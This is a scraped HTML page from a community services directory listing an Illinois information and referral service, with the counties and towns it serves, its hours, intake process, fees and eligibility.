5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Beecher</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bolingbrook</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Braidwood</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Channahon</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Crest Hill</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Crete</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Elwood</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Frankfort</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Homer Glen</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Joliet</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lockport</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Manhattan</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mokena</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Monee</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Naperville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">New Lenox</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Peotone</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Plainfield</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Romeoville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Shorewood</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wilmington</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Williamson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Winnebago</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Woodford</p><ul></ul></li></ul></li></ul></td></tr></table></div></div></div>&nbsp;&nbsp;<a id="editDetailsLink10238" style="font-size: 0.9em;" title="Edit Service Details" href="/index.php/component/cpx/?task=resource.edit&amp;id=115545&amp;service_id=10238">[Edit Service Details]</a><div></li><li class="view_type_service_list" id="view_field_primaryServices" ><p><a id="toggleDetailsLink466" title="Toggle Service Details" href="javascript:toggleServiceDetailsList(466, 'Specialized Information and Referral')">Specialized Information and Referral</a>&nbsp;&nbsp;<a href="/index.php/component/cpx/?task=services.code&amp;code=TJ-3000.8000" style="font-size: 0.9em;" >[Show Definition Details]</a><div id="serviceDetailsList466" class="div_service_details" style="display: none; visibility: hidden; margin: 5px 0 5px 10px;" ><div style="margin-bottom: 10px"><span style="font-weight: bold;">Geography Served</span><div style="margin-left: 15px;"><div style="width: 90%; border-left: 1px solid #AAA; padding-left: 3px; margin-bottom: 10px;"><table style="width: 100%"><tr><td><ul><li><p style="font-weight: bold; border-bottom: 1px dotted #CCC; font-size: .9em;">Illinois</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Adams</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Alexander</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bond</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Boone</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Brown</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bureau</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Calhoun</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Carroll</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Cass</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Champaign</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Christian</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Clark</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Clay</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Clinton</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Coles</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Cook</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Crawford</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Cumberland</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Dekalb</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Dewitt</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Douglas</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Dupage</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Addison</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Aurora</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bartlett</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bensenville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bloomingdale</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Carol Stream</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Clarendon Hills</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Darien</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Downers Grove</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Elmhurst</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Eola</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Fox Valley</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Glendale Heights</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Glen Ellyn</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hinsdale</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Itasca</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lisle</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lombard</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Medinah</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Naperville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Oak Brook</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Roselle</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Villa Park</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Warrenville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wayne</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">West Chicago</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Westmont</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wheaton</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Willowbrook</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Winfield</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wood Dale</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Woodridge</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Edgar</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Edwards</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Effingham</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Fayette</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Ford</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Franklin</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Fulton</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Gallatin</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Greene</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Grundy</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hamilton</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hancock</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hardin</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Henderson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Henry</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Iroquois</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jackson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jasper</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jefferson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jersey</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Jo Daviess</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Johnson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Kane</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Kankakee</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Aroma Park</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bonfield</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bourbonnais</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bradley</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Buckingham</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Essex</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Grant Park</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Herscher</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hopkins Park</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Kankakee</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Manteno</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Momence</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Reddick</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Saint Anne</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Union Hill</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Kendall</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Knox</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lake</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">La Salle</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lawrence</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lee</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Livingston</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Logan</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Macon</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Macoupin</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Madison</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Marion</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Marshall</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mason</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Massac</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Brookport</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Joppa</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Metropolis</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mcdonough</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mchenry</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mclean</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Menard</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mercer</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Monroe</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Montgomery</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Morgan</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Moultrie</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Ogle</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Peoria</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Perry</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Piatt</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Pike</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Pope</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Pulaski</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Putnam</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Randolph</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Richland</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Rock Island</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Saint Clair</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Saline</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Sangamon</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Schuyler</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Browning</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Camden</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Frederick</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Huntsville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Littleton</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Rushville</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Scott</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Shelby</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Stark</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Stephenson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Tazewell</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Armington</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Creve Coeur</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Deer Creek</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Delavan</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">East Peoria</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Green Valley</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Groveland</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Hopedale</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mackinaw</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Minier</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Morton</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Pekin</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">South Pekin</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Tremont</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Washington</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Union</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Vermilion</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wabash</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Warren</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Washington</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wayne</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">White</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Whiteside</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Will</p><ul><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Beecher</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Bolingbrook</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Braidwood</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Channahon</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Crest Hill</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Crete</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Elwood</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Frankfort</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Homer Glen</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Joliet</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Lockport</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Manhattan</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Mokena</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Monee</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Naperville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">New Lenox</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Peotone</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Plainfield</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Romeoville</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Shorewood</p></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Wilmington</p></li></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Williamson</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Winnebago</p><ul></ul></li><li><p style="margin: 5px 0 3px 8px; border-bottom: 1px dotted #DDD; font-size:1em">Woodford</p><ul></ul></li></ul></li></ul></td></tr></table></div></div></div>&nbsp;&nbsp;<a id="editDetailsLink466" style="font-size: 0.9em;" title="Edit Service Details" href="/index.php/component/cpx/?task=resource.edit&amp;id=115545&amp;service_id=466">[Edit Service Details]</a><div></li></div><p class="view_type_label" id="view_field_generalInfoLabel">General Information</p><p class="view_label_type_textarea" id="view_label_field_hours">Hours:</p><p class="view_type_textarea" id="view_field_hours">9:00 am-5:00 pm Monday-Friday</p><p class="view_label_type_textarea" id="view_label_field_intakeProcedure">Intake Process:</p><p class="view_type_textarea" id="view_field_intakeProcedure">Go onto website or call for information</p><p class="view_label_type_textarea" id="view_label_field_programFees">Program Fees:</p><p class="view_type_textarea" id="view_field_programFees">None</p><p class="view_label_type_textarea" id="view_label_field_languages">Languages:</p><p class="view_type_textarea" id="view_field_languages">English</p><p class="view_label_type_textarea" id="view_label_field_eligibility">Eligibility:</p><p class="view_type_textarea" id="view_field_eligibility">Must be an Illinois parent or school personnel.</p><p class="view_label_type_checkbox" id="view_label_field_accessibility_flag" >Handicap Accessible?  </p><p  class="view_type_checkbox" id="view_field_accessibility_flag">Yes</p><p class="view_label_type_checkbox" id="view_label_field_is_shelter" >Is Shelter?  </p><p  class="view_type_checkbox" id="view_field_is_shelter">No</p>            </div>
                    </div>

      	</td>

     	<td style="width: 300px; vertical-align: top;">
     		     		<div class="map">
           		<div id="gmap" style="height: 250px; border: 1px solid #CCC;"></div>
		</div>
          			<div style="padding: 15px;">
		         			<p><a target="_blank" href="http://maps.google.com/?q=121 N. Kickapoo Street, Lincoln, IL,62656" style="font-size: 1.2em;">View larger map &raquo;</a></p>
         			<p><a target="_blank" href="http://maps.google.com/?daddr=121 N. Kickapoo Street, 62656&hl=en" style="font-size: 1.2em;">Get directions &raquo;</a></p>
         		</div>

         		<div style="padding: 0px 15px 15px 15px">
          		<p><a href="/index.php/component/cpx/?task=resource&amp;id=115545&amp;view=send&amp;method=email" style="font-size: 1.2em;">Send to email &raquo;</a></p>
         		<p><a href="/index.php/component/cpx/?task=resource&amp;id=115545&amp;view=send&amp;method=sms" style="font-size: 1.2em;">Send to my phone &raquo;</a></p>
         		<p><a target="_blank" href="/index2.php?option=com_cpx&task=resource&id=115545&view=send&method=print" style="font-size: 1.2em;">Print &raquo;</a></p>
          	</div>
		          	<div class="groups">
				<h2>Resource Groups</h2>

				             		<ul>
             			<li class="last">
             				<h3><a href="/index.php/component/cpx/?task=account" class="red"><span class="underline">Login</span>&raquo;</a> to Manage Groups</h3>

							<p style="padding-top: 5px;">Create groups to save and organize individual resources.</p>

							<p style="padding-top: 5px;">Login or create an account to begin.</p>
             			</li>
             		</ul>
             	           	</div>
     	</td>
 	</tr>
    </table>
</div>


	<p style="font-size: 0.01em;" class="white"><a href = "index.php?option=com_cpx&task=bot">.</a></p>

	</div>
</div>
      
                </div>
      
      <div class="joomla-footer span-22 prepend-1 append-1">
                  
        <div id="footer" class="clearfix">

    <div id="copyright">&copy; Kane County Guide to Community Services. All Rights Reserved</div>

    <!-- <div id="legal"><a href="#" title="Privacy Policy">Privacy Policy</a> | <a href="http://www.unitedwaynashville.org/misc/terms-of-use/" title="Terms of Use">Terms of Use</a></div> -->

</div><!-- closes id="footer" -->
        <!-- &copy;2016 Kane County Guide - Elgin, Aurora -->
      </div>
    </div>
    
    </div><!-- /site_wrapper -->
  </body>
</html>
